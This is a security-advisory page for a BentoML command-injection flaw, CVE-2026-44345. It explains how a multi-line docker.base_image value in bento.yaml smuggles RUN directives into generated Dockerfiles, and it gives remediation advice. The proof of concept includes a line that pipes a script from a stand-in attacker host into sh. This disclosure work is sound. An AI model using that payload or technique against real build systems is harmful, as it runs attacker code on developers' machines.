Skip to main content

BentoML CVE-2026-44345

| EUVDEUVD-2026-32610 HIGH
OS Command Injection (CWE-78)
2026-05-11 https://github.com/bentoml/BentoML GHSA-78f9-r8mh-4xm2
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 11, 2026 - 14:45 vuln.today
Analysis Generated
May 11, 2026 - 14:45 vuln.today
CVE Published
May 11, 2026 - 14:27 nvd
HIGH 8.8

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 20 pypi packages depend on bentoml (20 direct, 0 indirect)

Ecosystem-wide dependent count for version 1.4.39.

DescriptionGitHub Advisory

The same Dockerfile template that mishandles envs[*].name (pending GHSA-w2pm-x38x-jp44) also interpolates docker.base_image raw with no escaping, newline filtering, or validation. A malicious bento.yaml with a multi-line docker.base_image value smuggles arbitrary Dockerfile directives into the generated Dockerfile, and bentoml containerize then runs docker build which executes the injected RUN directives on the victim host.

Vulnerable code

src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:38 (current main, 2026-04-28):

jinja
FROM {{ __options__base_image }} AS base-container

__options__base_image resolves to DockerOptions.base_image (src/bentoml/_internal/bento/build_config.py:176):

python
base_image: t.Optional[str] = None

No validator, no converter, no newline check. The value is loaded straight from bento.yaml in src/bentoml/_internal/container/__init__.py:206 via DockerOptions(**docker_attrs) and rendered as-is.

PoC

Malicious bentofile.yaml:

yaml
docker:
  base_image: |
    python:3.10
    RUN curl https://attacker.tld/x.sh | sh
    FROM scratch

Minimal reproduction of the unsafe interpolation:

python
from jinja2 import Environment
env = Environment()
malicious = 'python:3.10\nRUN curl https://attacker.tld/x.sh | sh\nFROM scratch'
out = env.from_string('FROM {{ __options__base_image }} AS base-container').render(__options__base_image=malicious)
print(out)

Output:

FROM python:3.10
RUN curl https://attacker.tld/x.sh | sh
FROM scratch AS base-container

Three valid Dockerfile directives instead of one. The RUN curl executes during docker build. The trailing FROM scratch AS base-container provides the named build stage the rest of the template depends on, so the build proceeds without error.

Impact

Identical to GHSA-w2pm-x38x-jp44: arbitrary command execution on the victim's host during bentoml containerize of an attacker-supplied bento. Threat model is bento sharing (registry, marketplace, supply-chain handoff). The victim expects docker.base_image to be a Docker image reference, not a Dockerfile fragment.

Suggested fix

Validate DockerOptions.base_image at the config layer: reject any value containing newline characters (\n, \r) or whitespace beyond a single space-separated tag. A regex like ^[A-Za-z0-9._/-]+(:[A-Za-z0-9._-]+)?(@sha256:[a-f0-9]{64})?$ covers the practical Docker reference format.

The same hardening should be extended to other unvalidated fields interpolated raw in base_v2.j2:

  • __options__build_include[*] at line 97 (COPY ... ./src/{{ name }} ./src/{{ name }}) - same newline-injection class for path entries from Image.build_include(*file_paths).
  • bento__user, bento__uid_gid, bento__path, bento__home, bento__entrypoint - currently sourced from server-side defaults but should be defended in depth if they ever become user-overridable through override_bento_env.

References

  • Pending sibling: GHSA-w2pm-x38x-jp44 (envs[*].name), itself a sibling-fix-bypass of CVE-2026-33744 / CVE-2026-35043.
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html

AnalysisAI

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Technical ContextAI

BentoML is a Python ML model serving framework that generates Docker containers from bento packages. The vulnerability exists in the Jinja2 template 'base_v2.j2' at line 38, which renders 'FROM {{ __options__base_image }} AS base-container' without input sanitization. The base_image field is loaded from user-supplied bento.yaml via DockerOptions dataclass (build_config.py:176) with no pydantic validator or newline filtering. Jinja2 templates perform text interpolation without escaping Dockerfile control characters. Multi-line YAML values (using | or > syntax) preserve newlines, allowing attackers to inject additional Dockerfile directives. The CWE-78 (OS Command Injection) classification applies because docker build executes the resulting Dockerfile's RUN commands on the host OS. This is a template injection variant targeting infrastructure-as-code rather than web contexts.

RemediationAI

Upgrade to BentoML 1.4.39 or later immediately via 'pip install --upgrade bentoml>=1.4.39'. The patch adds input validation to reject newline characters in docker.base_image and related configuration fields. If immediate upgrade is not feasible, implement these compensating controls with noted trade-offs: (1) Code review all bento.yaml files before containerization - blocks automation, adds manual overhead, prone to human error missing obfuscated newlines. (2) Use an allowlist of approved base images in CI/CD via pre-commit hook or linter that rejects any base_image value containing \n or \r characters - partial protection but bypassable via Unicode normalization attacks. (3) Run 'bentoml containerize' only in isolated ephemeral containers or VMs with no network access and disposable filesystems - mitigates impact but adds infrastructure complexity and breaks caching workflows. None of these workarounds provide equivalent security to patching. Vendor advisory with technical details: https://github.com/bentoml/BentoML/security/advisories/GHSA-78f9-r8mh-4xm2. Verify patch installation by checking installed version matches fixed release.

More in Python

View all
CVE-2025-24016 CRITICAL POC
9.9 Feb 10

Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t

CVE-2025-27520 CRITICAL POC
9.8 Apr 04

BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser

CVE-2025-2945 CRITICAL POC
9.9 Apr 03

pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi

CVE-2013-5093 MEDIUM POC
6.8 Sep 27

The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python

CVE-2025-32375 CRITICAL POC
9.8 Apr 09

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica

CVE-2014-0224 HIGH POC
7.4 Jun 05

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph

CVE-2024-21644 HIGH POC
7.5 Jan 08

pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.

CVE-2017-9462 HIGH POC
8.8 Jun 06

In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2024-21645 MEDIUM POC
5.3 Jan 08

pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne

CVE-2026-33017 CRITICAL POC
9.3 Mar 17

Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301

CVE-2026-55255 HIGH POC
8.4 Jun 19

Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing

Share

CVE-2026-44345 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy